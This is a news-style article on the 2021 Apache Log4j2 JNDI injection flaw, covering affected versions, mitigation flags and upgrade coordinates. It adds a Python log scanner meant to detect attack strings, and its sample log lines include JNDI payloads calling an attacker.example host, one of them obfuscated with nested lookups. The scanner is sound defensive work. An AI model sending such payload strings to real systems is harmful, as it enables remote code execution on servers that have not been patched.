How the Log4j2 RCE Flaw Threatened Global Systems and What to Do Now
A critical remote code execution vulnerability in Apache Log4j2, exposed through JNDI injection, has impacted major services worldwide, prompting urgent patches, temporary mitigations, and ongoing updates from the Apache project to protect vulnerable Java applications.
Several hours ago, a remote code execution vulnerability in Apache Log4j2 was disclosed, allowing attackers to craft malicious data requests that trigger code execution. Major tech companies, including Baidu, have been affected.
According to the latest Apache announcement, Log4j‑2.15.0 has been released to fix the issue, and the official release process is underway.
Apache Log4j2 was originally written by Ceki Gülcü as part of the Apache Logging Services project. It is a Java logging framework that supersedes Log4j 1 with significant improvements and fixes for inherent problems in the Logback architecture.
Through the Log4j2 framework, developers can control log generation by defining log levels for each message.
The framework is widely used in business systems to record logs, often including error information derived from user input.
Vulnerability Description
The disclosed Log4j2 remote code execution flaw stems from a Java JNDI injection vulnerability: when user‑supplied data is logged, an attacker can craft a special request that triggers arbitrary code execution on the target server.
Affected versions: Apache Log4j 2.x ≤ 2.14.1
Known affected applications and components include:
spring-boot-starter-log4j2
Apache Solr
Apache Flink
Apache Druid
The vulnerability has been rated as “high severity” with a very low exploitation barrier. Numerous components and large‑scale applications such as Apache Solr, Apache Struts2, Apache Druid, and Apache Flink have already been impacted, requiring immediate remediation.
Mitigation
Apache has published a new version that resolves the flaw. Affected users should upgrade all Log4j2‑related applications to the latest Log4j‑2.15.0‑rc2 version and also update the known vulnerable components listed above.
Temporary mitigation recommendations:
Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true
Set log4j2.formatMsgNoLookups=True
Configure FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
Globally, many websites have already been compromised by this vulnerability, with Baidu and iCloud among the cited examples.
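Added here as an example that is not part of the original article: a small Python scanner that searches existing access or application logs for the JNDI lookup string described above, so a team applying the mitigations can also check whether such input ever reached a logger. The log lines, the attacker.example host and the function names are constructed for this illustration; it goes beyond the plain form the article mentions by first resolving nested lookups (${lower:...}, ${name:-...}) that Log4j would expand before the jndi: prefix becomes visible.

```python
import re

# Constructed sample log lines (not real traffic). Line 2 carries the plain
# lookup string; line 3 hides it behind nested lookups that Log4j resolves
# from the inside out before it ever sees the jndi: prefix.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"
203.0.113.12 - - [10/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://attacker.example/b}"
"""

# Innermost lookups Log4j substitutes first: ${lower:X}, ${upper:X} and the
# default-value form ${name:-X} (an empty name still yields X).
_INNER = re.compile(
    r"\$\{(?P<fn>lower|upper):(?P<arg>[^${}]*)\}"
    r"|\$\{[^${}]*:-(?P<dflt>[^${}]*)\}",
    re.IGNORECASE,
)

# The outer lookup we actually want to find, case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m):
    if m.group("fn") is not None:
        arg = m.group("arg")
        return arg.lower() if m.group("fn").lower() == "lower" else arg.upper()
    return m.group("dflt")


def normalize(s: str) -> str:
    """Collapse nested lookups repeatedly until nothing changes, as the logger would."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(_resolve, s)
    return s


def find_jndi_lookups(text: str) -> list:
    """Return (line_number, normalized_line) for every line containing ${jndi:."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((no, norm))
    return hits


if __name__ == "__main__":
    for no, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {no}: {line}")
```

A hit only proves the string was received, not that it was logged by a vulnerable Log4j2 build, so cross-check hits against the application's own log output and the version in use.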
Update
Apache’s release page now lists Log4j 2.15.0. The dependency coordinates (shown here in Ivy syntax) are:
<dependencies>
  <dependency org="org.apache.logging.log4j" name="log4j-api" rev="2.15.0" />
  <dependency org="org.apache.logging.log4j" name="log4j-core" rev="2.15.0" />
</dependencies>
The official release is still in progress, so the 2.15 version is not yet publicly available. Maven Central currently hosts no artifacts; they are expected to appear after a few hours.
Reference links:
https://github.com/apache/logging-log4j2
https://repository.apache.org/service/local/repositories/releases/content/org/apache/logging/log4j/log4j-core/2.15.0/log4j-core-2.15.0.jar
MaGe Linux Operations